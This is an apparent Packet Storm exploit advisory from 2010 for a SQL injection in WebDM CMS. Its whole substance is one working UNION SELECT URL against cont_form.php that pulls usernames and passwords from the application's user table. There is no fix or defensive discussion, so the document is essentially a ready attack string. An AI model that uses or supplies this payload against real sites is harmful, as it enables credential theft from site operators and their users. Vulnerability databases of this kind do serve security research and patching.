WebDM CMS SQL Injection

2010-11-02T00:00:00
ID PACKETSTORM:95393
Type packetstorm
Reporter Cru3l.b0y
Modified 2010-11-02T00:00:00

Description

                                        
                                            `In The Name Of GOD  
[+] Exploit Title: WebDM CMS SQL Injection Vulnerability  
[+] Date: 2010-10-31  
[+] Author : Cru3l.b0y  
[+] Software Link: http://www.internetdm.co.uk/site/pages.php?fid=0,1,12  
[+] Tested on: Ubuntu 10.10  
[+] Contact : Cru3l.b0y@gmail.com  
[+] Website : WwW.PenTesters.IR  
[+] Greeting: Behzad, Ahmad, ...  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Exploit :  
  
http://target/path/cont_form.php?fid=0,325&cf_id=-1+union+select+1,2,3,concat(User,0x3a,Password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user--  
  
`